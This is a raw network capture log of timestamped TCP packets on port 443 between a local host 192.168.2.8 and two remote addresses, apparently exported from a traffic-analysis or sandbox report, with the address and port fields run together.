                                                                                                                                                                          Dec 18, 2024 13:06:05.608685970 CET443497093.5.239.146192.168.2.8
                                                                                                                                                                          Dec 18, 2024 13:06:05.608714104 CET443497093.5.239.146192.168.2.8
                                                                                                                                                                          Dec 18, 2024 13:06:05.608810902 CET49709443192.168.2.83.5.239.146
                                                                                                                                                                          Dec 18, 2024 13:06:05.608829975 CET443497093.5.239.146192.168.2.8
                                                                                                                                                                          Dec 18, 2024 13:06:05.608867884 CET49709443192.168.2.83.5.239.146
                                                                                                                                                                          Dec 18, 2024 13:06:05.608867884 CET49709443192.168.2.83.5.239.146
                                                                                                                                                                          Dec 18, 2024 13:06:05.613964081 CET443497093.5.239.146192.168.2.8
                                                                                                                                                                          Dec 18, 2024 13:06:05.613997936 CET443497093.5.239.146192.168.2.8
                                                                                                                                                                          Dec 18, 2024 13:06:05.614093065 CET49709443192.168.2.83.5.239.146
                                                                                                                                                                          Dec 18, 2024 13:06:05.614101887 CET443497093.5.239.146192.168.2.8
                                                                                                                                                                          Dec 18, 2024 13:06:05.614166021 CET49709443192.168.2.83.5.239.146
                                                                                                                                                                          Dec 18, 2024 13:06:05.621814966 CET443497093.5.239.146192.168.2.8
                                                                                                                                                                          Dec 18, 2024 13:06:05.621844053 CET443497093.5.239.146192.168.2.8
                                                                                                                                                                          Dec 18, 2024 13:06:05.621903896 CET49709443192.168.2.83.5.239.146
                                                                                                                                                                          Dec 18, 2024 13:06:05.621913910 CET443497093.5.239.146192.168.2.8
                                                                                                                                                                          Dec 18, 2024 13:06:05.621942043 CET49709443192.168.2.83.5.239.146
                                                                                                                                                                          Dec 18, 2024 13:06:05.621961117 CET49709443192.168.2.83.5.239.146
                                                                                                                                                                          Dec 18, 2024 13:06:05.637481928 CET443497093.5.239.146192.168.2.8
                                                                                                                                                                          Dec 18, 2024 13:06:05.637573957 CET49709443192.168.2.83.5.239.146
                                                                                                                                                                          Dec 18, 2024 13:06:05.637576103 CET443497093.5.239.146192.168.2.8
                                                                                                                                                                          Dec 18, 2024 13:06:05.637629986 CET49709443192.168.2.83.5.239.146
                                                                                                                                                                          Dec 18, 2024 13:06:05.651076078 CET49709443192.168.2.83.5.239.146
                                                                                                                                                                          Dec 18, 2024 13:06:05.932876110 CET49712443192.168.2.852.95.160.78
                                                                                                                                                                          Dec 18, 2024 13:06:05.932921886 CET4434971252.95.160.78192.168.2.8
                                                                                                                                                                          Dec 18, 2024 13:06:05.933029890 CET49712443192.168.2.852.95.160.78
                                                                                                                                                                          Dec 18, 2024 13:06:05.933396101 CET49712443192.168.2.852.95.160.78
                                                                                                                                                                          Dec 18, 2024 13:06:05.933408976 CET4434971252.95.160.78192.168.2.8
                                                                                                                                                                          Dec 18, 2024 13:06:07.807746887 CET4434971252.95.160.78192.168.2.8
                                                                                                                                                                          Dec 18, 2024 13:06:07.810450077 CET49712443192.168.2.852.95.160.78
                                                                                                                                                                          Dec 18, 2024 13:06:07.810477018 CET4434971252.95.160.78192.168.2.8
                                                                                                                                                                          Dec 18, 2024 13:06:08.622323036 CET4434971252.95.160.78192.168.2.8
                                                                                                                                                                          Dec 18, 2024 13:06:08.673742056 CET49712443192.168.2.852.95.160.78
                                                                                                                                                                          Dec 18, 2024 13:06:08.869226933 CET4434971252.95.160.78192.168.2.8
                                                                                                                                                                          Dec 18, 2024 13:06:08.869244099 CET4434971252.95.160.78192.168.2.8
                                                                                                                                                                          Dec 18, 2024 13:06:08.869290113 CET4434971252.95.160.78192.168.2.8
                                                                                                                                                                          Dec 18, 2024 13:06:08.869312048 CET4434971252.95.160.78192.168.2.8
                                                                                                                                                                          Dec 18, 2024 13:06:08.869333029 CET4434971252.95.160.78192.168.2.8
                                                                                                                                                                          Dec 18, 2024 13:06:08.869457960 CET49712443192.168.2.852.95.160.78
                                                                                                                                                                          Dec 18, 2024 13:06:08.869457960 CET49712443192.168.2.852.95.160.78
                                                                                                                                                                          Dec 18, 2024 13:06:08.869476080 CET4434971252.95.160.78192.168.2.8
                                                                                                                                                                          Dec 18, 2024 13:06:08.869563103 CET49712443192.168.2.852.95.160.78
                                                                                                                                                                          Dec 18, 2024 13:06:09.336270094 CET4434971252.95.160.78192.168.2.8
                                                                                                                                                                          Dec 18, 2024 13:06:09.336286068 CET4434971252.95.160.78192.168.2.8
                                                                                                                                                                          Dec 18, 2024 13:06:09.336327076 CET4434971252.95.160.78192.168.2.8
                                                                                                                                                                          Dec 18, 2024 13:06:09.336400986 CET49712443192.168.2.852.95.160.78
                                                                                                                                                                          Dec 18, 2024 13:06:09.336412907 CET4434971252.95.160.78192.168.2.8
                                                                                                                                                                          Dec 18, 2024 13:06:09.336457968 CET49712443192.168.2.852.95.160.78
                                                                                                                                                                          Dec 18, 2024 13:06:09.596894979 CET4434971252.95.160.78192.168.2.8
                                                                                                                                                                          Dec 18, 2024 13:06:09.596910954 CET4434971252.95.160.78192.168.2.8
                                                                                                                                                                          Dec 18, 2024 13:06:09.596945047 CET4434971252.95.160.78192.168.2.8
                                                                                                                                                                          Dec 18, 2024 13:06:09.596982002 CET49712443192.168.2.852.95.160.78
                                                                                                                                                                          Dec 18, 2024 13:06:09.596997023 CET4434971252.95.160.78192.168.2.8
                                                                                                                                                                          Dec 18, 2024 13:06:09.597024918 CET49712443192.168.2.852.95.160.78
                                                                                                                                                                          Dec 18, 2024 13:06:09.597040892 CET49712443192.168.2.852.95.160.78
                                                                                                                                                                          Dec 18, 2024 13:06:09.720078945 CET4434971252.95.160.78192.168.2.8
                                                                                                                                                                          Dec 18, 2024 13:06:09.720201969 CET49712443192.168.2.852.95.160.78
                                                                                                                                                                          Dec 18, 2024 13:06:09.834846020 CET4434971252.95.160.78192.168.2.8
                                                                                                                                                                          Dec 18, 2024 13:06:09.834934950 CET49712443192.168.2.852.95.160.78
                                                                                                                                                                          Dec 18, 2024 13:06:09.834948063 CET4434971252.95.160.78192.168.2.8
                                                                                                                                                                          Dec 18, 2024 13:06:09.876815081 CET49712443192.168.2.852.95.160.78
                                                                                                                                                                          Dec 18, 2024 13:06:10.083003998 CET4434971252.95.160.78192.168.2.8
                                                                                                                                                                          Dec 18, 2024 13:06:10.083039045 CET4434971252.95.160.78192.168.2.8
                                                                                                                                                                          Dec 18, 2024 13:06:10.083082914 CET4434971252.95.160.78192.168.2.8
                                                                                                                                                                          Dec 18, 2024 13:06:10.083084106 CET49712443192.168.2.852.95.160.78
                                                                                                                                                                          Dec 18, 2024 13:06:10.083096981 CET4434971252.95.160.78192.168.2.8
                                                                                                                                                                          Dec 18, 2024 13:06:10.083116055 CET49712443192.168.2.852.95.160.78
                                                                                                                                                                          Dec 18, 2024 13:06:10.083138943 CET49712443192.168.2.852.95.160.78
                                                                                                                                                                          Dec 18, 2024 13:06:10.439598083 CET4434971252.95.160.78192.168.2.8
                                                                                                                                                                          Dec 18, 2024 13:06:10.439623117 CET4434971252.95.160.78192.168.2.8
                                                                                                                                                                          Dec 18, 2024 13:06:10.439683914 CET49712443192.168.2.852.95.160.78
                                                                                                                                                                          Dec 18, 2024 13:06:10.439698935 CET4434971252.95.160.78192.168.2.8
                                                                                                                                                                          Dec 18, 2024 13:06:10.439733982 CET49712443192.168.2.852.95.160.78
                                                                                                                                                                          Dec 18, 2024 13:06:10.439733982 CET49712443192.168.2.852.95.160.78
                                                                                                                                                                          Dec 18, 2024 13:06:10.601768017 CET4434971252.95.160.78192.168.2.8
                                                                                                                                                                          Dec 18, 2024 13:06:10.642447948 CET49712443192.168.2.852.95.160.78
                                                                                                                                                                          Dec 18, 2024 13:06:10.786458015 CET4434971252.95.160.78192.168.2.8
                                                                                                                                                                          Dec 18, 2024 13:06:10.786474943 CET4434971252.95.160.78192.168.2.8
                                                                                                                                                                          Dec 18, 2024 13:06:10.786514044 CET4434971252.95.160.78192.168.2.8
                                                                                                                                                                          Dec 18, 2024 13:06:10.786561966 CET4434971252.95.160.78192.168.2.8
                                                                                                                                                                          Dec 18, 2024 13:06:10.786571980 CET49712443192.168.2.852.95.160.78
                                                                                                                                                                          Dec 18, 2024 13:06:10.786571980 CET49712443192.168.2.852.95.160.78
                                                                                                                                                                          Dec 18, 2024 13:06:10.786582947 CET4434971252.95.160.78192.168.2.8
                                                                                                                                                                          Dec 18, 2024 13:06:10.786611080 CET49712443192.168.2.852.95.160.78
                                                                                                                                                                          Dec 18, 2024 13:06:10.829936981 CET49712443192.168.2.852.95.160.78
                                                                                                                                                                          Dec 18, 2024 13:06:11.030303001 CET4434971252.95.160.78192.168.2.8
                                                                                                                                                                          Dec 18, 2024 13:06:11.030323029 CET4434971252.95.160.78192.168.2.8
                                                                                                                                                                          Dec 18, 2024 13:06:11.030365944 CET4434971252.95.160.78192.168.2.8
                                                                                                                                                                          Dec 18, 2024 13:06:11.030404091 CET4434971252.95.160.78192.168.2.8
                                                                                                                                                                          Dec 18, 2024 13:06:11.030405045 CET49712443192.168.2.852.95.160.78
                                                                                                                                                                          Dec 18, 2024 13:06:11.030422926 CET4434971252.95.160.78192.168.2.8
                                                                                                                                                                          Dec 18, 2024 13:06:11.030458927 CET49712443192.168.2.852.95.160.78
                                                                                                                                                                          Dec 18, 2024 13:06:11.079926968 CET49712443192.168.2.852.95.160.78
                                                                                                                                                                          Dec 18, 2024 13:06:11.269884109 CET4434971252.95.160.78192.168.2.8
                                                                                                                                                                          Dec 18, 2024 13:06:11.269898891 CET4434971252.95.160.78192.168.2.8
                                                                                                                                                                          Dec 18, 2024 13:06:11.269920111 CET4434971252.95.160.78192.168.2.8
                                                                                                                                                                          Dec 18, 2024 13:06:11.269928932 CET4434971252.95.160.78192.168.2.8
                                                                                                                                                                          Dec 18, 2024 13:06:11.270013094 CET49712443192.168.2.852.95.160.78
                                                                                                                                                                          Dec 18, 2024 13:06:11.270013094 CET49712443192.168.2.852.95.160.78
                                                                                                                                                                          Dec 18, 2024 13:06:11.270030022 CET4434971252.95.160.78192.168.2.8
                                                                                                                                                                          Dec 18, 2024 13:06:11.270143032 CET49712443192.168.2.852.95.160.78
                                                                                                                                                                          Dec 18, 2024 13:06:11.270153046 CET4434971252.95.160.78192.168.2.8
                                                                                                                                                                          Dec 18, 2024 13:06:11.314306021 CET49712443192.168.2.852.95.160.78
                                                                                                                                                                          Dec 18, 2024 13:06:11.505862951 CET4434971252.95.160.78192.168.2.8
                                                                                                                                                                          Dec 18, 2024 13:06:11.505882978 CET4434971252.95.160.78192.168.2.8
                                                                                                                                                                          Dec 18, 2024 13:06:11.505904913 CET4434971252.95.160.78192.168.2.8
                                                                                                                                                                          Dec 18, 2024 13:06:11.505914927 CET4434971252.95.160.78192.168.2.8
                                                                                                                                                                          Dec 18, 2024 13:06:11.505954981 CET49712443192.168.2.852.95.160.78
                                                                                                                                                                          Dec 18, 2024 13:06:11.505965948 CET4434971252.95.160.78192.168.2.8
                                                                                                                                                                          Dec 18, 2024 13:06:11.505986929 CET49712443192.168.2.852.95.160.78
                                                                                                                                                                          Dec 18, 2024 13:06:11.506021976 CET49712443192.168.2.852.95.160.78
                                                                                                                                                                          Dec 18, 2024 13:06:11.509656906 CET4434971252.95.160.78192.168.2.8
                                                                                                                                                                          Dec 18, 2024 13:06:11.564332008 CET49712443192.168.2.852.95.160.78
                                                                                                                                                                          Dec 18, 2024 13:06:11.639236927 CET4434971252.95.160.78192.168.2.8
                                                                                                                                                                          Dec 18, 2024 13:06:11.639250040 CET4434971252.95.160.78192.168.2.8
                                                                                                                                                                          Dec 18, 2024 13:06:11.639270067 CET4434971252.95.160.78192.168.2.8
                                                                                                                                                                          Dec 18, 2024 13:06:11.639278889 CET4434971252.95.160.78192.168.2.8
                                                                                                                                                                          Dec 18, 2024 13:06:11.639308929 CET49712443192.168.2.852.95.160.78
                                                                                                                                                                          Dec 18, 2024 13:06:11.639327049 CET4434971252.95.160.78192.168.2.8
                                                                                                                                                                          Dec 18, 2024 13:06:11.639348030 CET49712443192.168.2.852.95.160.78
                                                                                                                                                                          Dec 18, 2024 13:06:11.639436960 CET49712443192.168.2.852.95.160.78
                                                                                                                                                                          Dec 18, 2024 13:06:11.639442921 CET4434971252.95.160.78192.168.2.8
                                                                                                                                                                          Dec 18, 2024 13:06:11.689294100 CET49712443192.168.2.852.95.160.78
                                                                                                                                                                          Dec 18, 2024 13:06:11.783221006 CET4434971252.95.160.78192.168.2.8
                                                                                                                                                                          Dec 18, 2024 13:06:11.783232927 CET4434971252.95.160.78192.168.2.8
                                                                                                                                                                          Dec 18, 2024 13:06:11.783260107 CET4434971252.95.160.78192.168.2.8
                                                                                                                                                                          Dec 18, 2024 13:06:11.783269882 CET4434971252.95.160.78192.168.2.8
                                                                                                                                                                          Dec 18, 2024 13:06:11.783293962 CET49712443192.168.2.852.95.160.78
                                                                                                                                                                          Dec 18, 2024 13:06:11.783307076 CET4434971252.95.160.78192.168.2.8
                                                                                                                                                                          Dec 18, 2024 13:06:11.783337116 CET49712443192.168.2.852.95.160.78
                                                                                                                                                                          Dec 18, 2024 13:06:11.783350945 CET49712443192.168.2.852.95.160.78
                                                                                                                                                                          Dec 18, 2024 13:06:11.783402920 CET4434971252.95.160.78192.168.2.8
                                                                                                                                                                          Dec 18, 2024 13:06:11.829922915 CET49712443192.168.2.852.95.160.78
                                                                                                                                                                          Dec 18, 2024 13:06:11.994443893 CET4434971252.95.160.78192.168.2.8
                                                                                                                                                                          Dec 18, 2024 13:06:11.994469881 CET4434971252.95.160.78192.168.2.8
                                                                                                                                                                          Dec 18, 2024 13:06:11.994487047 CET4434971252.95.160.78192.168.2.8
                                                                                                                                                                          Dec 18, 2024 13:06:11.994497061 CET4434971252.95.160.78192.168.2.8
                                                                                                                                                                          Dec 18, 2024 13:06:11.994551897 CET4434971252.95.160.78192.168.2.8
                                                                                                                                                                          Dec 18, 2024 13:06:11.994574070 CET49712443192.168.2.852.95.160.78
                                                                                                                                                                          Dec 18, 2024 13:06:11.994574070 CET49712443192.168.2.852.95.160.78
                                                                                                                                                                          Dec 18, 2024 13:06:11.994592905 CET4434971252.95.160.78192.168.2.8
                                                                                                                                                                          Dec 18, 2024 13:06:11.994641066 CET49712443192.168.2.852.95.160.78
                                                                                                                                                                          Dec 18, 2024 13:06:12.032237053 CET4434971252.95.160.78192.168.2.8
                                                                                                                                                                          Dec 18, 2024 13:06:12.032250881 CET4434971252.95.160.78192.168.2.8
                                                                                                                                                                          Dec 18, 2024 13:06:12.032284021 CET4434971252.95.160.78192.168.2.8
                                                                                                                                                                          Dec 18, 2024 13:06:12.032300949 CET49712443192.168.2.852.95.160.78
                                                                                                                                                                          Dec 18, 2024 13:06:12.032314062 CET4434971252.95.160.78192.168.2.8
                                                                                                                                                                          Dec 18, 2024 13:06:12.032325029 CET4434971252.95.160.78192.168.2.8
                                                                                                                                                                          Dec 18, 2024 13:06:12.032372952 CET49712443192.168.2.852.95.160.78
                                                                                                                                                                          Dec 18, 2024 13:06:12.032372952 CET49712443192.168.2.852.95.160.78
                                                                                                                                                                          Dec 18, 2024 13:06:12.241261005 CET4434971252.95.160.78192.168.2.8
                                                                                                                                                                          Dec 18, 2024 13:06:12.241291046 CET4434971252.95.160.78192.168.2.8
                                                                                                                                                                          Dec 18, 2024 13:06:12.241324902 CET4434971252.95.160.78192.168.2.8
                                                                                                                                                                          Dec 18, 2024 13:06:12.241352081 CET49712443192.168.2.852.95.160.78
                                                                                                                                                                          Dec 18, 2024 13:06:12.241363049 CET4434971252.95.160.78192.168.2.8
                                                                                                                                                                          Dec 18, 2024 13:06:12.241571903 CET49712443192.168.2.852.95.160.78
                                                                                                                                                                          Dec 18, 2024 13:06:12.269349098 CET4434971252.95.160.78192.168.2.8
                                                                                                                                                                          Dec 18, 2024 13:06:12.269367933 CET4434971252.95.160.78192.168.2.8
                                                                                                                                                                          Dec 18, 2024 13:06:12.269393921 CET4434971252.95.160.78192.168.2.8
                                                                                                                                                                          Dec 18, 2024 13:06:12.269422054 CET49712443192.168.2.852.95.160.78
                                                                                                                                                                          Dec 18, 2024 13:06:12.269435883 CET4434971252.95.160.78192.168.2.8
                                                                                                                                                                          Dec 18, 2024 13:06:12.269462109 CET49712443192.168.2.852.95.160.78
                                                                                                                                                                          Dec 18, 2024 13:06:12.269467115 CET4434971252.95.160.78192.168.2.8
                                                                                                                                                                          Dec 18, 2024 13:06:12.269493103 CET49712443192.168.2.852.95.160.78
                                                                                                                                                                          Dec 18, 2024 13:06:12.269519091 CET49712443192.168.2.852.95.160.78
                                                                                                                                                                          Dec 18, 2024 13:06:12.270200014 CET49712443192.168.2.852.95.160.78
                                                                                                                                                                          Dec 18, 2024 13:06:19.461693048 CET49718443192.168.2.83.5.239.146
                                                                                                                                                                          Dec 18, 2024 13:06:19.461754084 CET443497183.5.239.146192.168.2.8
                                                                                                                                                                          Dec 18, 2024 13:06:19.461951017 CET49718443192.168.2.83.5.239.146
                                                                                                                                                                          Dec 18, 2024 13:06:19.462272882 CET49718443192.168.2.83.5.239.146
                                                                                                                                                                          Dec 18, 2024 13:06:19.462294102 CET443497183.5.239.146192.168.2.8
                                                                                                                                                                          Dec 18, 2024 13:06:21.278562069 CET443497183.5.239.146192.168.2.8
                                                                                                                                                                          Dec 18, 2024 13:06:21.290273905 CET49718443192.168.2.83.5.239.146
                                                                                                                                                                          Dec 18, 2024 13:06:21.290313005 CET443497183.5.239.146192.168.2.8
                                                                                                                                                                          Dec 18, 2024 13:06:22.033953905 CET443497183.5.239.146192.168.2.8
                                                                                                                                                                          Dec 18, 2024 13:06:22.080017090 CET49718443192.168.2.83.5.239.146
                                                                                                                                                                          Dec 18, 2024 13:06:22.082588911 CET443497183.5.239.146192.168.2.8
                                                                                                                                                                          Dec 18, 2024 13:06:22.082604885 CET443497183.5.239.146192.168.2.8
                                                                                                                                                                          Dec 18, 2024 13:06:22.082623959 CET443497183.5.239.146192.168.2.8
                                                                                                                                                                          Dec 18, 2024 13:06:22.082632065 CET443497183.5.239.146192.168.2.8
                                                                                                                                                                          Dec 18, 2024 13:06:22.082655907 CET443497183.5.239.146192.168.2.8
                                                                                                                                                                          Dec 18, 2024 13:06:22.082665920 CET49718443192.168.2.83.5.239.146
                                                                                                                                                                          Dec 18, 2024 13:06:22.082674980 CET443497183.5.239.146192.168.2.8
                                                                                                                                                                          Dec 18, 2024 13:06:22.082684994 CET49718443192.168.2.83.5.239.146
                                                                                                                                                                          Dec 18, 2024 13:06:22.082712889 CET49718443192.168.2.83.5.239.146
                                                                                                                                                                          Dec 18, 2024 13:06:22.090770960 CET443497183.5.239.146192.168.2.8
                                                                                                                                                                          Dec 18, 2024 13:06:22.142478943 CET49718443192.168.2.83.5.239.146
                                                                                                                                                                          Dec 18, 2024 13:06:22.261666059 CET443497183.5.239.146192.168.2.8
                                                                                                                                                                          Dec 18, 2024 13:06:22.261679888 CET443497183.5.239.146192.168.2.8
                                                                                                                                                                          Dec 18, 2024 13:06:22.261713028 CET443497183.5.239.146192.168.2.8
                                                                                                                                                                          Dec 18, 2024 13:06:22.261745930 CET443497183.5.239.146192.168.2.8
                                                                                                                                                                          Dec 18, 2024 13:06:22.261754036 CET443497183.5.239.146192.168.2.8
                                                                                                                                                                          Dec 18, 2024 13:06:22.261826038 CET49718443192.168.2.83.5.239.146
                                                                                                                                                                          Dec 18, 2024 13:06:22.261846066 CET443497183.5.239.146192.168.2.8
                                                                                                                                                                          Dec 18, 2024 13:06:22.261861086 CET49718443192.168.2.83.5.239.146
                                                                                                                                                                          Dec 18, 2024 13:06:22.311108112 CET443497183.5.239.146192.168.2.8
                                                                                                                                                                          Dec 18, 2024 13:06:22.311134100 CET443497183.5.239.146192.168.2.8
                                                                                                                                                                          Dec 18, 2024 13:06:22.311292887 CET49718443192.168.2.83.5.239.146
                                                                                                                                                                          Dec 18, 2024 13:06:22.311320066 CET443497183.5.239.146192.168.2.8
                                                                                                                                                                          Dec 18, 2024 13:06:22.316396952 CET443497183.5.239.146192.168.2.8
                                                                                                                                                                          Dec 18, 2024 13:06:22.316473961 CET49718443192.168.2.83.5.239.146
                                                                                                                                                                          Dec 18, 2024 13:06:22.316483974 CET443497183.5.239.146192.168.2.8
                                                                                                                                                                          Dec 18, 2024 13:06:22.361202002 CET49718443192.168.2.83.5.239.146
                                                                                                                                                                          Dec 18, 2024 13:06:22.436165094 CET443497183.5.239.146192.168.2.8
                                                                                                                                                                          Dec 18, 2024 13:06:22.436182976 CET443497183.5.239.146192.168.2.8
                                                                                                                                                                          Dec 18, 2024 13:06:22.436218977 CET443497183.5.239.146192.168.2.8
                                                                                                                                                                          Dec 18, 2024 13:06:22.436234951 CET443497183.5.239.146192.168.2.8
                                                                                                                                                                          Dec 18, 2024 13:06:22.436256886 CET443497183.5.239.146192.168.2.8
                                                                                                                                                                          Dec 18, 2024 13:06:22.436275959 CET49718443192.168.2.83.5.239.146
                                                                                                                                                                          Dec 18, 2024 13:06:22.436289072 CET443497183.5.239.146192.168.2.8
                                                                                                                                                                          Dec 18, 2024 13:06:22.436331987 CET49718443192.168.2.83.5.239.146
                                                                                                                                                                          Dec 18, 2024 13:06:22.462035894 CET443497183.5.239.146192.168.2.8
                                                                                                                                                                          Dec 18, 2024 13:06:22.462054968 CET443497183.5.239.146192.168.2.8
                                                                                                                                                                          Dec 18, 2024 13:06:22.462099075 CET443497183.5.239.146192.168.2.8
                                                                                                                                                                          Dec 18, 2024 13:06:22.462127924 CET443497183.5.239.146192.168.2.8
                                                                                                                                                                          Dec 18, 2024 13:06:22.462176085 CET49718443192.168.2.83.5.239.146
                                                                                                                                                                          Dec 18, 2024 13:06:22.462184906 CET443497183.5.239.146192.168.2.8
                                                                                                                                                                          Dec 18, 2024 13:06:22.462229013 CET49718443192.168.2.83.5.239.146
                                                                                                                                                                          Dec 18, 2024 13:06:22.465560913 CET443497183.5.239.146192.168.2.8
                                                                                                                                                                          Dec 18, 2024 13:06:22.465687990 CET49718443192.168.2.83.5.239.146
                                                                                                                                                                          Dec 18, 2024 13:06:22.487584114 CET443497183.5.239.146192.168.2.8
                                                                                                                                                                          Dec 18, 2024 13:06:22.487607002 CET443497183.5.239.146192.168.2.8
                                                                                                                                                                          Dec 18, 2024 13:06:22.487720966 CET49718443192.168.2.83.5.239.146
                                                                                                                                                                          Dec 18, 2024 13:06:22.487739086 CET443497183.5.239.146192.168.2.8
                                                                                                                                                                          Dec 18, 2024 13:06:22.487776995 CET49718443192.168.2.83.5.239.146
                                                                                                                                                                          Dec 18, 2024 13:06:22.491070986 CET443497183.5.239.146192.168.2.8
                                                                                                                                                                          Dec 18, 2024 13:06:22.513221025 CET443497183.5.239.146192.168.2.8
                                                                                                                                                                          Dec 18, 2024 13:06:22.513240099 CET443497183.5.239.146192.168.2.8
                                                                                                                                                                          Dec 18, 2024 13:06:22.513339043 CET49718443192.168.2.83.5.239.146
                                                                                                                                                                          Dec 18, 2024 13:06:22.513353109 CET443497183.5.239.146192.168.2.8
                                                                                                                                                                          Dec 18, 2024 13:06:22.564353943 CET49718443192.168.2.83.5.239.146
                                                                                                                                                                          Dec 18, 2024 13:06:22.564379930 CET443497183.5.239.146192.168.2.8
                                                                                                                                                                          Dec 18, 2024 13:06:22.611236095 CET49718443192.168.2.83.5.239.146
                                                                                                                                                                          Dec 18, 2024 13:06:22.622629881 CET443497183.5.239.146192.168.2.8
                                                                                                                                                                          Dec 18, 2024 13:06:22.622649908 CET443497183.5.239.146192.168.2.8
                                                                                                                                                                          Dec 18, 2024 13:06:22.622672081 CET443497183.5.239.146192.168.2.8
                                                                                                                                                                          Dec 18, 2024 13:06:22.622680902 CET443497183.5.239.146192.168.2.8
                                                                                                                                                                          Dec 18, 2024 13:06:22.622741938 CET49718443192.168.2.83.5.239.146
                                                                                                                                                                          Dec 18, 2024 13:06:22.622752905 CET443497183.5.239.146192.168.2.8
                                                                                                                                                                          Dec 18, 2024 13:06:22.622796059 CET49718443192.168.2.83.5.239.146
                                                                                                                                                                          Dec 18, 2024 13:06:22.625031948 CET443497183.5.239.146192.168.2.8
                                                                                                                                                                          Dec 18, 2024 13:06:22.642748117 CET443497183.5.239.146192.168.2.8
                                                                                                                                                                          Dec 18, 2024 13:06:22.642759085 CET443497183.5.239.146192.168.2.8
                                                                                                                                                                          Dec 18, 2024 13:06:22.642776966 CET443497183.5.239.146192.168.2.8
                                                                                                                                                                          Dec 18, 2024 13:06:22.642786026 CET443497183.5.239.146192.168.2.8
                                                                                                                                                                          Dec 18, 2024 13:06:22.642843962 CET49718443192.168.2.83.5.239.146
                                                                                                                                                                          Dec 18, 2024 13:06:22.642855883 CET443497183.5.239.146192.168.2.8
                                                                                                                                                                          Dec 18, 2024 13:06:22.642894983 CET49718443192.168.2.83.5.239.146
                                                                                                                                                                          Dec 18, 2024 13:06:22.659446001 CET443497183.5.239.146192.168.2.8
                                                                                                                                                                          Dec 18, 2024 13:06:22.659460068 CET443497183.5.239.146192.168.2.8
                                                                                                                                                                          Dec 18, 2024 13:06:22.659490108 CET443497183.5.239.146192.168.2.8
                                                                                                                                                                          Dec 18, 2024 13:06:22.659517050 CET443497183.5.239.146192.168.2.8
                                                                                                                                                                          Dec 18, 2024 13:06:22.659535885 CET49718443192.168.2.83.5.239.146
                                                                                                                                                                          Dec 18, 2024 13:06:22.659537077 CET443497183.5.239.146192.168.2.8
                                                                                                                                                                          Dec 18, 2024 13:06:22.659552097 CET443497183.5.239.146192.168.2.8
                                                                                                                                                                          Dec 18, 2024 13:06:22.659595013 CET49718443192.168.2.83.5.239.146
                                                                                                                                                                          Dec 18, 2024 13:06:22.659624100 CET49718443192.168.2.83.5.239.146
                                                                                                                                                                          Dec 18, 2024 13:06:22.676153898 CET443497183.5.239.146192.168.2.8
                                                                                                                                                                          Dec 18, 2024 13:06:22.676177025 CET443497183.5.239.146192.168.2.8
                                                                                                                                                                          Dec 18, 2024 13:06:22.676215887 CET443497183.5.239.146192.168.2.8
                                                                                                                                                                          Dec 18, 2024 13:06:22.676249981 CET49718443192.168.2.83.5.239.146
                                                                                                                                                                          Dec 18, 2024 13:06:22.676258087 CET443497183.5.239.146192.168.2.8
                                                                                                                                                                          Dec 18, 2024 13:06:22.676285982 CET49718443192.168.2.83.5.239.146
                                                                                                                                                                          Dec 18, 2024 13:06:22.692857027 CET443497183.5.239.146192.168.2.8
                                                                                                                                                                          Dec 18, 2024 13:06:22.692887068 CET443497183.5.239.146192.168.2.8
                                                                                                                                                                          Dec 18, 2024 13:06:22.692948103 CET49718443192.168.2.83.5.239.146
                                                                                                                                                                          Dec 18, 2024 13:06:22.692958117 CET443497183.5.239.146192.168.2.8
                                                                                                                                                                          Dec 18, 2024 13:06:22.693005085 CET49718443192.168.2.83.5.239.146
                                                                                                                                                                          Dec 18, 2024 13:06:22.693079948 CET443497183.5.239.146192.168.2.8
                                                                                                                                                                          Dec 18, 2024 13:06:22.693115950 CET49718443192.168.2.83.5.239.146
                                                                                                                                                                          Dec 18, 2024 13:06:22.709830999 CET443497183.5.239.146192.168.2.8
                                                                                                                                                                          Dec 18, 2024 13:06:22.709856033 CET443497183.5.239.146192.168.2.8
                                                                                                                                                                          Dec 18, 2024 13:06:22.709896088 CET443497183.5.239.146192.168.2.8
                                                                                                                                                                          Dec 18, 2024 13:06:22.709913015 CET49718443192.168.2.83.5.239.146
                                                                                                                                                                          Dec 18, 2024 13:06:22.709939003 CET443497183.5.239.146192.168.2.8
                                                                                                                                                                          Dec 18, 2024 13:06:22.709958076 CET49718443192.168.2.83.5.239.146
                                                                                                                                                                          Dec 18, 2024 13:06:22.722110987 CET49718443192.168.2.83.5.239.146
                                                                                                                                                                          Dec 18, 2024 13:06:22.726428032 CET443497183.5.239.146192.168.2.8
                                                                                                                                                                          Dec 18, 2024 13:06:22.726453066 CET443497183.5.239.146192.168.2.8
                                                                                                                                                                          Dec 18, 2024 13:06:22.726511002 CET49718443192.168.2.83.5.239.146
                                                                                                                                                                          Dec 18, 2024 13:06:22.726524115 CET443497183.5.239.146192.168.2.8
                                                                                                                                                                          Dec 18, 2024 13:06:22.726547956 CET49718443192.168.2.83.5.239.146
                                                                                                                                                                          Dec 18, 2024 13:06:22.767484903 CET49718443192.168.2.83.5.239.146
                                                                                                                                                                          Dec 18, 2024 13:06:22.767501116 CET443497183.5.239.146192.168.2.8
                                                                                                                                                                          Dec 18, 2024 13:06:22.808538914 CET443497183.5.239.146192.168.2.8
                                                                                                                                                                          Dec 18, 2024 13:06:22.808571100 CET443497183.5.239.146192.168.2.8
                                                                                                                                                                          Dec 18, 2024 13:06:22.808610916 CET49718443192.168.2.83.5.239.146
                                                                                                                                                                          Dec 18, 2024 13:06:22.808640003 CET443497183.5.239.146192.168.2.8
                                                                                                                                                                          Dec 18, 2024 13:06:22.808661938 CET49718443192.168.2.83.5.239.146
                                                                                                                                                                          Dec 18, 2024 13:06:22.818865061 CET443497183.5.239.146192.168.2.8
                                                                                                                                                                          Dec 18, 2024 13:06:22.818877935 CET443497183.5.239.146192.168.2.8
                                                                                                                                                                          Dec 18, 2024 13:06:22.818896055 CET443497183.5.239.146192.168.2.8
                                                                                                                                                                          Dec 18, 2024 13:06:22.818928957 CET443497183.5.239.146192.168.2.8
                                                                                                                                                                          Dec 18, 2024 13:06:22.818938971 CET49718443192.168.2.83.5.239.146
                                                                                                                                                                          Dec 18, 2024 13:06:22.818952084 CET443497183.5.239.146192.168.2.8
                                                                                                                                                                          Dec 18, 2024 13:06:22.818985939 CET49718443192.168.2.83.5.239.146
                                                                                                                                                                          Dec 18, 2024 13:06:22.830446959 CET443497183.5.239.146192.168.2.8
                                                                                                                                                                          Dec 18, 2024 13:06:22.830482960 CET443497183.5.239.146192.168.2.8
                                                                                                                                                                          Dec 18, 2024 13:06:22.830496073 CET443497183.5.239.146192.168.2.8
